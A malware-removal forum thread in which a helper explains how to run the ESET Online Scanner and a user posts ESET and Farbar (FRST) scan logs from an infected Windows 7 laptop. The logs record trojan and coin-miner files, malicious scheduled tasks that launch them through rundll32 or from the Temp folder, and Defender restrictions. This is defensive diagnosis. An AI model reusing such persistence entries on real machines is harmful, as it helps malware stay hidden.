Keep RKill available
I would suggest a free scan with the ESET Online Scanner.
Go to https://download.ese...linescanner.exe
It will start a download of "esetonlinescanner.exe"
Save the file to your system, such as the Downloads folder, or else to the Desktop.
Go to the saved file, and double click it to get it started.
When presented with the initial ESET options, click on "Computer Scan".
Next, when prompted by Windows, allow it to start by clicking Yes.
When prompted for scan type, click on Full scan.
Tick (select) the radio selection "Enable ESET to detect and quarantine potentially unwanted applications" and click on the Start scan button.
Have patience. The entire process may take an hour or more. There is an initial update download.
There is a progress window display. You may step away from the machine and let it be.
You should ignore all prompts to get the ESET antivirus software program (e.g. their standard program). You do not need to buy or get or install anything else.
When the scan is completed, if something was found, it will show a screen with the number of detected items. If so, click the button marked View detected results.
Click the blue Save scan log to save the log.
If something was removed and you know it is a false finding, you may click on the blue Restore cleaned files (in blue, at bottom).
Press Continue when all done. You should click to turn off the offer for periodic scanning.
Please make sure you attach the log report.
Try another scan with MalwareBytes with rootkit scan enabled.
Multiple infections including conhoy.exe
#16
Posted 29 March 2022 - 10:33 AM
MS - MVP Consumer Security 2009 - 2016, WI-MVP 2016-17
Antivirus Scanners Online Scanners Firewalls Slow Computer??
#17
Posted 29 March 2022 - 10:34 AM
After trying to scan with the above, please take a new scan using Farbar Recovery Tool
#18
Posted 29 March 2022 - 01:17 PM
Finally got Emsisoft to run. Here is the log.
Edited by Ztruker, 29 March 2022 - 01:23 PM.
Rich
Die with memories, not dreams. – Unknown
#19
Posted 29 March 2022 - 01:26 PM
I'll run ESET if it will run then Malwarebytes with rootkit scan enabled again and post all results.
Edit: MBAM finished, here is the log:
Edited by Ztruker, 29 March 2022 - 02:38 PM.
#20
Posted 29 March 2022 - 03:38 PM
How is the computer now?
#21
Posted 29 March 2022 - 05:20 PM
#22
Posted 29 March 2022 - 05:52 PM
On a normal boot, conhoy.exe still shows up in C:\Windows\Temp.
Here is the ESET scan:
3/29/2022 19:40:22 PM
Files scanned: 204567
Detected files: 8
Cleaned files: 8
Total scan time 01:34:21
Scan status: Finished
C:\Windows\debug\item.dat a variant of Win32/Agent.WTF trojan cleaned by deleting
C:\Windows\inf\aspnet\config.json Win64/CoinMiner.RO potentially unwanted application cleaned by deleting
C:\Windows\inf\aspnet\lsma22.exe a variant of Win64/CoinMiner.AAP trojan cleaned by deleting
C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\upsupx2[1].exe a variant of Win32/Agent.UIG trojan cleaned by deleting
C:\Windows\System32\Tasks\Mysa2 XML/TrojanDownloader.ftp.A trojan cleaned by deleting
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\20201117[2].rar a variant of Win32/Agent.WTF trojan cleaned by deleting
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\u[1].exe a variant of Win32/Agent.TZB trojan cleaned by deleting
C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\xmr1025[2].rar a variant of Win64/CoinMiner.AAP trojan cleaned by deleting
==============================================================================
Farbar reports next:
Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version: 28-03-2022
Ran by Marilyn (administrator) on MARILYN-HP (Hewlett-Packard HP G56 Notebook PC) (29-03-2022 19:42:05)
Running from C:\Users\Marilyn\Desktop
Loaded Profiles: Marilyn
Platform: Microsoft Windows 7 Home Premium Service Pack 1 (X64) Language: English (United States)
Default browser: Brave
Boot Mode: Safe Mode (with Networking)
==================== Processes (Whitelisted) =================
(If an entry is included in the fixlist, the process will be closed. The file will not be moved.)
(services.exe ->) (Cisco WebEx LLC -> Cisco WebEx LLC) C:\Windows\SysWOW64\atashost.exe
(services.exe ->) (Malwarebytes Inc -> Malwarebytes) C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe
(svchost.exe ->) (Microsoft Windows -> Microsoft Corporation) C:\Windows\System32\dllhost.exe
==================== Registry (Whitelisted) ===================
(If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)
HKLM\...\Run: [SynTPEnh] => C:\Program Files\Synaptics\SynTP\SynTPEnh.exe [2281256 2012-02-02] (Synaptics Incorporated -> Synaptics Incorporated)
HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RtkNGUI64.exe [6245408 2010-05-25] (Realtek Semiconductor Corp -> Realtek Semiconductor)
HKLM\...\Run: [Everything] => C:\Program Files\Everything\Everything.exe [2240288 2019-02-04] (voidtools -> voidtools)
HKLM-x32\...\Run: [HP Software Update] => C:\Program Files (x86)\Hp\HP Software Update\HPWuSchd2.exe (No File)
HKLM-x32\...\Run: [HP Quick Launch] => C:\Program Files (x86)\Hewlett-Packard\HP Quick Launch\HPMSGSVC.exe (No File)
HKLM-x32\...\Run: [BFHP] => C:\Program Files (x86)\Common Files\BeFrugal.com\Toolbar\BFHP.exe (No File)
HKLM-x32\...\Run: [AvgUi] => "C:\Program Files (x86)\AVG\Framework\Common\avguirna.exe" /lps=fmw (No File)
HKLM-x32\...\Run: [APSDaemon] => C:\Program Files (x86)\Common Files\Apple\Apple Application Support\APSDaemon.exe [59720 2013-09-13] (Apple Inc. -> Apple Inc.)
HKLM-x32\...\Run: [Adobe Reader Speed Launcher] => C:\Program Files (x86)\Adobe\Reader 9.0\Reader\Reader_sl.exe [41056 2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM-x32\...\Run: [Adobe ARM] => C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\AdobeARM.exe [958576 2013-04-04] (Adobe Systems, Incorporated -> Adobe Systems Incorporated)
HKLM\SOFTWARE\Policies\Microsoft\Windows Defender: Restriction <==== ATTENTION
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\DOCK\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Run: [CCleaner Smart Cleaning] => "C:\Program Files\CCleaner\CCleaner64.exe" /MONITOR (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {1addf19c-3bd0-11e5-b90f-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {39bee1c8-8691-11e7-973b-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1000\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [swg] => "C:\Program Files (x86)\Google\GoogleToolbarNotifier\GoogleToolbarNotifier.exe" (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-1004\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HPAdvisorDock] => C:\Program Files (x86)\Hewlett-Packard\HP Advisor\Dock\HPAdvisorDock.exe (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HLBackupScheduler] => C:\Program Files\Verizon Cloud\Verizon Cloud Service.exe [6415168 2015-02-10] (Hyperlync Technologies Inc. -> )
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Run: [HP ENVY 7640 series (NET)] => "C:\Program Files\HP\HP ENVY 7640 series\Bin\ScanToPCActivationApp.exe" -deviceID "TH51627030063T:NW" -scfn "HP ENVY 7640 series (NET)" -AutoStart 1 (No File)
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\Policies\Explorer: [HideSCAHealth] 1
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: F - F:\VZW_Software_upgrade_assistant.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: {04f7e41a-a707-11e2-b587-60eb6909b7df} - F:\VerizonSWUpgradeAssistantLauncher.exe
HKU\S-1-5-21-1250379553-2428740185-3603661230-501\...\MountPoints2: {ead950e8-3187-11e5-8649-60eb6909b7df} - F:\VZW_Software_upgrade_assistant.exe
HKLM\...\Print\Monitors\HP a011 Status Monitor: C:\Windows\system32\hpinkstsa011LM.dll [354152 2011-06-08] (Hewlett Packard -> Hewlett-Packard Co.)
HKLM\...\Print\Monitors\HP DC11 Status Monitor: C:\Windows\system32\hpinkstsDC11LM.dll [336904 2014-08-01] (Hewlett Packard -> Hewlett-Packard Development Company, LP)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Microsoft\Active Setup\Installed Components: [{8A69D345-D564-463c-AFF1-A69D9E530F96}] -> "C:\Program Files (x86)\Google\Chrome\Application\91.0.4472.106\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel
HKLM\Software\Microsoft\Active Setup\Installed Components: [{A509B1FF-37FF-4bFF-8CFF-4F3A747040FF}] -> C:\Windows\system32\advpack.dll [2009-07-13] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\Microsoft\Active Setup\Installed Components: [{AFE6A462-C574-4B8A-AF43-4CC60DF4563B}] -> C:\Program Files\BraveSoftware\Brave-Browser\Application\99.1.36.122\Installer\chrmstp.exe [2022-03-28] (Brave Software, Inc. -> Brave Software, Inc.)
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{2D46B6DC-2207-486B-B523-A557E6D54B47}] -> C:\Windows\system32\cmd.exe /D /C start C:\Windows\system32\ie4uinit.exe -ClearIconCache
HKLM\Software\Wow6432Node\Microsoft\Active Setup\Installed Components: [{A509B1FF-37FF-4bFF-8CFF-4F3A747040FF}] -> C:\Windows\SysWOW64\advpack.dll [2009-07-13] (Microsoft Windows -> Microsoft Corporation)
HKLM\Software\...\Authentication\Credential Providers: [{F8A0B131-5F68-486c-8040-7E8FC3C85BB6}] -> C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDCREDPROV.DLL [2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
IFEO\uihost32.exe: [Debugger] ntsd -d
IFEO\uihost64.exe: [Debugger] ntsd -d
IFEO\vid001.exe: [Debugger] ntsd -d
Policies: C:\ProgramData\NTUSER.pol: Restriction <==== ATTENTION
==================== Scheduled Tasks (Whitelisted) ============
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
Task: {1F798407-258E-40E4-88D5-09E365947CCC} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Update Check => C:\ProgramData\Hewlett-Packard\HP Support Framework\Resources\Updater\HPSFUpdater.exe /s /p 1 (No File)
Task: {2B642391-2C6A-419F-A839-4CD0FB785BDE} - System32\Tasks\oka => c:\windows\inf\aspnet\lsma22.exe (No File)
Task: {53967A89-F06F-46F1-B3BA-D1A5E6FB8CBD} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Health Analysis => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L Analysis (No File)
Task: {64F3A87C-8458-49D9-AA07-4AA60700F58D} - System32\Tasks\BraveSoftwareUpdateTaskMachineUA => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {77B2A611-2A8B-4136-9E0A-B69F523C8EA1} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(No) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=2 (No File)
Task: {88C169BB-B378-4BDD-BF10-DE1BA9564722} - System32\Tasks\Mysa1 => rundll32.exe c:\windows\debug\item.dat,ServiceMain aaaa <==== ATTENTION
Task: {8A502165-5679-46B2-83D6-881CC55ED923} - System32\Tasks\{F3E9CAEC-BBD5-4EE4-9A4A-BB27D26A356D} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\Hewlett-Packard\SmartPrint\smartprintsetup.exe" -d C:\Users\Marilyn\Desktop
Task: {A4A25E16-BC91-4ACE-9676-11A976F8163C} - System32\Tasks\Hewlett-Packard\HP Support Assistant\PC Tuneup => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\HPSF.exe /L TuneupTimer (No File)
Task: {A760FF1D-B5F3-4136-8519-93331B6E089C} - System32\Tasks\BraveSoftwareUpdateTaskMachineCore => C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
Task: {AA8D5163-B71D-4B7E-B7C2-215E15C37B54} - System32\Tasks\MicrosoftsWindowsy => c:\windows\temp\conhoy.exe (No File) <==== ATTENTION
Task: {ADC35D8D-8FD8-4112-A8AE-1873442EF63F} - \McAfee Remediation (Prepare) -> No File <==== ATTENTION
Task: {B6513C2B-1469-4BB6-9007-29A630203521} - System32\Tasks\HPCustPartic.exe_{BE46DC17-3C77-4163-8B22-E2A235CF8971} => C:\Program Files\HP\HP ENVY 7640 series\Bin\HPCustPartic.exe /installoptin 1444481912 /installreport yes (No File)
Task: {CD1BAF60-5996-47FD-8F0B-1BFC5643A5BC} - \Mysa2 -> No File <==== ATTENTION
Task: {CEAF0A86-3EE6-4454-8C0D-CD971E6FEF8A} - System32\Tasks\Hewlett-Packard\HP Support Assistant\Warranty Opt-In(Yes) => c:\program files (x86)\hewlett-packard\hp health check\activecheck\product_line\Detection_PostWarrantyAlert.exe /EventId=1 (No File)
Task: {DC967769-6098-473C-8B18-8854081C98E1} - System32\Tasks\{F49F3141-310E-4D17-964E-8CBAEDD01415} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\DriverUpdate\UninstallStub.exe" -c --log {36488064-fdb3-451c-923b-fdd9d69c2554}
Task: {DE3295F5-6883-451F-8BD7-F00ACCB8E70C} - System32\Tasks\AVG EUpdate Task => avgsetupx.exe /eu (No File)
Task: {DF5AF517-6345-4C01-9682-5D3B6468BCE8} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => C:\Windows\ehome\mcupdate.exe -MediaCenterRecoveryTask (No File)
Task: {F094EA7D-B75A-434A-B205-0A3FF27DADDB} - System32\Tasks\Hewlett-Packard\HP Support Assistant\HP Support Assistant Quick Start => C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPSFMessenger\HPSFMsgr.exe /taskrestart (No File)
Task: {FB7E5A6C-33D5-432D-98AE-AF0F25FE07BD} - System32\Tasks\ok => rundll32.exe c:\windows\debug\ok.dat,ServiceMain aaaa <==== ATTENTION
Task: {FE236B39-3A39-4715-B59E-00AAB070A19E} - System32\Tasks\{046A1759-6A62-4179-9ADF-004EE4E67228} => C:\Windows\system32\pcalua.exe -a "C:\Program Files (x86)\AVG\AVG10\avgmfapx.exe" -c /AppMode=SETUP /Uninstall
(If an entry is included in the fixlist, the task (.job) file will be moved. The file which is running by the task will not be moved.)
Task: C:\Windows\Tasks\EOSv3 Scheduler onLogOn.job => C:\Users\Marilyn\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe
Task: C:\Windows\Tasks\EOSv3 Scheduler onTime.job => C:\Users\Marilyn\AppData\Local\ESET\ESETOnlineScanner\ESETOnlineScanner.exe
==================== Internet (Whitelisted) ====================
(If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)
IPSecPolicy: [ActivePolicy] SOFTWARE\Policies\Microsoft\Windows\IPSEC\Policy\Local\ipsecPolicy{7abfca63-0362-4561-bed5-28e417e3aeb4} <==== ATTENTION (Restriction - IP)
Winsock: Catalog5 08 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5 09 C:\Program Files (x86)\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [134528 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5-x64 08 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Winsock: Catalog5-x64 09 C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDNSP.DLL [168304 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
Tcpip\Parameters: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{A9E69046-4B35-4ED2-BFB6-2CF003180388}: [DhcpNameServer] 192.168.0.1
Tcpip\..\Interfaces\{BC3C3E83-A47F-40E3-8DD5-864B4044E098}: [DhcpNameServer] 172.16.103.1
FireFox:
========
FF DefaultProfile: hsfkrlor.default
FF ProfilePath: C:\Users\Marilyn\AppData\Roaming\Mozilla\Firefox\Profiles\hsfkrlor.default [2022-03-28]
FF ProfilePath: C:\Users\Marilyn\AppData\Roaming\Mozilla\Firefox\Profiles\krham40v.default-release [2022-03-28]
FF Homepage: Mozilla\Firefox\Profiles\krham40v.default-release -> hxxps://www.google.com/?gws_rd=ssl
FF HKLM-x32\...\Firefox\Extensions: [quickprint@hp.com] - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension
FF Extension: (SmartPrintButton) - C:\Program Files (x86)\Hewlett-Packard\SmartPrint\QPExtension [2011-01-26] [Legacy] [not signed]
FF HKLM-x32\...\Thunderbird\Extensions: [msktbird@mcafee.com] - C:\Program Files\McAfee\MSK => not found
FF Plugin: @mcafee.com/MSC,version=10 -> c:\PROGRA~1\mcafee\msc\NPMCSN~1.DLL [No File]
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @adobe.com/ShockwavePlayer -> C:\Windows\SysWOW64\Adobe\Director\np32dsw.dll [2010-05-05] (Adobe Systems, Inc.) [File not signed]
FF Plugin-x32: @mcafee.com/MSC,version=10 -> c:\PROGRA~2\mcafee\msc\NPMCSN~1.DLL [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @Microsoft.com/NpCtrl,version=1.0 -> c:\Program Files (x86)\Microsoft Silverlight\5.1.10411.0\npctrl.dll [2012-04-11] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: @microsoft.com/WLPG,version=14.0.8117.0416 -> C:\Program Files (x86)\Windows Live\Photo Gallery\NPWLPG.dll [2010-04-17] (Microsoft Corporation -> Microsoft Corporation)
FF Plugin-x32: Adobe Reader -> C:\Program Files (x86)\Adobe\Reader 9.0\Reader\AIR\nppdf32.dll [2013-05-08] (Adobe Systems, Incorporated -> Adobe Systems Inc.)
FF Plugin HKU\S-1-5-21-1250379553-2428740185-3603661230-1000: @rocketlife.com/RocketLife Secure Plug-In Layer;version=1.0.5 -> C:\Users\Marilyn\AppData\Roaming\Visan\plugins\npRLSecurePluginLayer.dll [2011-11-15] (RocketLife -> RocketLife, LLP)
Chrome:
=======
CHR HKLM-x32\...\Chrome\Extension: [ihcjicgdanjaechkgeegckofjjedodee]
Brave:
=======
BRA Profile: C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default [2022-03-29]
BRA HomePage: Default -> hxxps://www.google.com/
BRA StartupUrls: Default -> "hxxps://www.google.com/"
BRA DefaultSearchKeyword: Default -> :g
BRA Extension: (Malwarebytes Browser Guard) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\Default\Extensions\ihcjicgdanjaechkgeegckofjjedodee [2022-03-28]
BRA Extension: (Brave Local Data Files Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\afalakplffnnnlkncjhbmahjfjhmlkal [2022-03-28]
BRA Extension: (Brave NTP background images) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\aoojcmojmmcbpfgoecoadbdpnagfchel [2022-03-28]
BRA Extension: (Wallet Data Files Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\BraveWallet [2022-03-28]
BRA Extension: (Brave Ad Block Updater (Default)) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\cffkpbalmllkdoenhmdmpbkajipdjfam [2022-03-28]
BRA Extension: (Brave NTP sponsored images) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\gccbbckogglekeggclmmekihdgdpdgoe [2022-03-29]
BRA Extension: (Brave SpeedReader Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\jicbkmdloagakknpihibphagfckhjdih [2022-03-28]
BRA Extension: (Brave HTTPS Everywhere Updater) - C:\Users\Marilyn\AppData\Local\BraveSoftware\Brave-Browser\User Data\oofiananboodjbbmdelgdommihjbkfag [2022-03-28]
==================== Services (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S2 AERTFilters; C:\Program Files\Realtek\Audio\HDA\AERTSr64.exe [98208 2009-11-17] (Andrea Electronics -> Andrea Electronics Corporation)
S2 brave; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
S3 bravem; C:\Program Files (x86)\BraveSoftware\Update\BraveUpdate.exe [162968 2022-03-28] (Brave Software, Inc. -> BraveSoftware Inc.)
S2 CinemaNow Service; C:\Program Files (x86)\CinemaNow\CinemaNow Media Manager\CinemanowSvc.exe [140272 2010-05-21] (Sonic Solutions -> CinemaNow, Inc.)
S3 clr_optimization_v2.0.50727_64; C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorsvw.exe [89920 2009-06-10] (Microsoft Corporation -> Microsoft Corporation)
S2 clr_optimization_v4.0.30319_64; C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorsvw.exe [123856 2012-07-09] (Microsoft Dynamic Code Publisher -> Microsoft Corporation)
S2 Everything; C:\Program Files\Everything\Everything.exe [2240288 2019-02-04] (voidtools -> voidtools)
R2 MBAMService; C:\Program Files\Malwarebytes\Anti-Malware\MBAMService.exe [7972536 2022-03-28] (Malwarebytes Inc -> Malwarebytes)
S3 mfevtp; C:\Windows\system32\mfevtps.exe [342768 2016-11-14] (McAfee, Inc. -> McAfee, Inc.)
S3 WinDefend; C:\Program Files\Windows Defender\mpsvc.dll [1011712 2009-07-13] (Microsoft Windows -> Microsoft Corporation)
S2 wlidsvc; C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE [2291568 2009-08-18] (Microsoft Corporation -> Microsoft Corporation)
S3 ClientAnalyticsService; "C:\Program Files\Common Files\McAfee\ClientAnalytics\Legacy\McClientAnalytics.exe" [X]
S4 HomeNetSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 HP Support Assistant Service; "C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\hpsa_service.exe" [X]
S4 McBootDelayStartSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McMPFSvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McNaiAnn; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McODS; "C:\Program Files\McAfee\VirusScan\mcods.exe" [X]
S4 mcpltsvc; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 McProxy; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
S4 MSK80Service; "C:\Program Files\Common Files\McAfee\Platform\McSvcHost\McSvHost.exe" /McCoreSvc [X]
===================== Drivers (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
S3 cfwids; C:\Windows\System32\drivers\cfwids.sys [88456 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 HipShieldK; C:\Windows\System32\drivers\HipShieldK.sys [216704 2016-08-02] (McAfee, Inc. -> McAfee, Inc.)
S2 MBAMChameleon; C:\Windows\System32\Drivers\MbamChameleon.sys [220568 2022-03-29] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S3 MBAMProtection; C:\Windows\system32\DRIVERS\mbam.sys [69040 2022-03-28] (Microsoft Windows Hardware Compatibility Publisher -> Malwarebytes)
S3 MBAMSwissArmy; C:\Windows\System32\Drivers\mbamswissarmy.sys [248992 2022-03-29] (Malwarebytes Inc -> Malwarebytes)
S2 McPvDrv; C:\Windows\system32\drivers\McPvDrv.sys [87928 2016-08-01] (McAfee, Inc. -> McAfee, Inc.)
S3 mfeaack; C:\Windows\System32\drivers\mfeaack.sys [484576 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 mfeavfk; C:\Windows\System32\drivers\mfeavfk.sys [366320 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 mfefirek; C:\Windows\System32\drivers\mfefirek.sys [518184 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R0 mfehidk; C:\Windows\System32\drivers\mfehidk.sys [916432 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 mfencbdc; C:\Windows\System32\DRIVERS\mfencbdc.sys [498152 2016-10-24] (McAfee, Inc. -> McAfee, Inc.)
S3 mfencrk; C:\Windows\System32\DRIVERS\mfencrk.sys [109336 2016-10-24] (McAfee, Inc. -> McAfee, Inc.)
S3 mfeplk; C:\Windows\System32\drivers\mfeplk.sys [110248 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
R0 mfewfpk; C:\Windows\System32\drivers\mfewfpk.sys [254800 2016-11-18] (McAfee, Inc. -> McAfee, Inc.)
S3 SrvHsfHDA; C:\Windows\System32\DRIVERS\VSTAZL6.SYS [292864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SrvHsfV92; C:\Windows\System32\DRIVERS\VSTDPV6.SYS [1485312 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SrvHsfWinac; C:\Windows\System32\DRIVERS\VSTCNXT6.SYS [740864 2009-06-10] (Microsoft Windows -> Conexant Systems, Inc.)
S3 SWDUMon; C:\Windows\System32\DRIVERS\SWDUMon.sys [13920 2017-01-26] (SlimWare Utilities Inc. -> )
S3 USBAAPL64; C:\Windows\System32\Drivers\usbaapl64.sys [52736 2012-07-09] (Microsoft Windows Hardware Compatibility Publisher -> Apple, Inc.)
==================== NetSvcs (Whitelisted) ===================
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
NETSVC: MsF928BDEEApp -> no filepath.
==================== One month (created) (Whitelisted) =========
(If an entry is included in the fixlist, the file/folder will be moved.)
2022-03-29 19:42 - 2022-03-29 19:43 - 000023627 _____ C:\Users\Marilyn\Desktop\FRST.txt
2022-03-29 17:33 - 2022-03-29 17:33 - 000001203 _____ C:\Users\Marilyn\Desktop\ESET Online Scanner.lnk
